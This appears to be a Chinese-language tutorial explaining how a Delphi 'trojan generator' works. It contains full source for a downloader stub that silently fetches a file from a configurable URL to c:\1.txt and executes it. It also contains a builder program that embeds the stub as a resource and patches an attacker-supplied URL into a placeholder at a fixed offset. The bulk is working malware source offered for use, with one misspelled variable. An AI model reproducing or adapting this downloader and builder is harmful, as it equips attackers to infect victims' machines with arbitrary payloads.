Delphi木马生成器原理

先写服务端Server.exe,控制台程序

program server;

{$IMAGEBASE $13140000}

uses
  Windows,
  SysUtils,
  urlmon,
  shellapi;
var
  url: pchar ='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
procedure Download;
begin
URLDownloadToFile(nil, url, 'c:\1.txt', 0, nil);
shellexecute(0,'open','c:\1.txt',0,0,1);
end;

begin
  DownLoad;
end.

再将Server.exe做成资源文件,RC文件写:jack RCDATA server.exe
找Server.exe文件偏移地址,用C32打开Server.exe,查找aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
将首地址转换成十进制即是我们要找的下载地址偏移。

再写主程序,将Server.exe资源文件加入,{$R server.RES}。

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;
    const
  OFFSET_URL =  65400;    //下载地址偏移

type
  TForm1 = class(TForm)
    Label1: TLabel;
    Edit1: TEdit;
    Button1: TButton;
    Edit2: TEdit;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}
{$R server.RES}

procedure TForm1.Button1Click(Sender: TObject);
var
  WriteBuff, ResultFilePath, ResourcePointer: PChar;
  ResourceLocation: HRSRC;
  ResourceSize, BytesWritten: Longword;
  ResDataHandle: THandle;
  FileHandle: THandle;
  sf:TSaveDialog;
  Url:string;
begin
  if trim(edit1.Text)='' then
  begin
    Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
    exit;
  end;
  sf :=TSaveDialog.Create(Application);
  sf.DefaultExt :='exe';
  sf.Title :='生成';
  if not sf.Execute then exit;
  Url :=trim(Edit1.Text); //trim函数去掉空格,取得编辑框输入的内容
  ResultFilePath := pchar(sf.FileName);
  ResourceLocation := FindResource(HInstance, 'jack', RT_RCDATA); //用资源RCDATA中urlmm资源
  if ResourceLocation <> 0 then
  begin
    ResourceSize := SizeofResource(HInstance, ResourceLocation);
    if ResourceSize <> 0 then
    begin
      ResDataHandle := LoadResource(HInstance, ResourceLocation);
      if ResDataHandle <> 0 then
      begin
        ResourcePointer := LockResource(ResDataHandle);
        if ResourcePointer <> nil then
        begin
          FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
          if FileHandle <> INVALID_HANDLE_VALUE then
          begin
            WriteFile(FileHandle, ResourcePointer^, {资源+大小的英语}ResourseSize, BytesWritten, nil);
            Sleep(10);
            //写入信息
            SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);
            WriteBuff := PChar(Url + StringOfChar(#0, 64 - Length(Url)));//64是我们预留的那个字符串的长度(即64个a)
            WriteFile(FileHandle, WriteBuff^, 64, BytesWritten, nil);
            CloseHandle(FileHandle);  //这个一定不能少
            MessageBox(0, '配置成功', '提示', mb_iconinformation);
          end;
        end;
      end;
    end;
  end;
end;

end.